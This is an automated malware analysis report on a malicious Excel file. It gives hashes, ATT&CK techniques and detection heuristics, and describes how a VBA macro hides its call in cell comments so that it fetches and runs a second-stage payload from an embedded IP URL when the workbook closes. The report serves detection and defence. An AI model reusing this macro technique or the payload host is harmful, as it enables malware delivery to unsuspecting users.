Office (OLE) / .XLS malware analysis — malicious · 832056e426d4fbfe

MALICIOUS

Office (OLE) / .XLS

61.0 KB Created: 2022-04-08 09:06:33 Authoring application: Microsoft Excel First seen: 2022-04-09

MD5: 27e575eb7332e80b66a09869e34ea459 SHA-1: 351ec141f5b29a2680508027c203a91d5d256023 SHA-256: 832056e426d4fbfea50daf213aa69a51150050337d0c624781bc201b4d6059bf

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an XLS file containing VBA macros. The Workbook_BeforeClose subroutine iterates through comments, and if a comment contains 'W', it assigns the comment's text to the 'Prog' variable. Subsequently, if another comment contains a colon, it uses the 'Prog' variable (which is expected to be a CreateObject string) to call InstallProduct with the colon-containing comment as an argument. This suggests the macro is designed to download and execute a second-stage payload from the embedded URL http://51.79.13.180, likely leveraging the CreateObject heuristic.

Heuristics 3

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://51.79.13.180

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `621d7d0991c51925900830faa77c5890fc50568382fade01e948be0f6b6cf33f`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1070 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.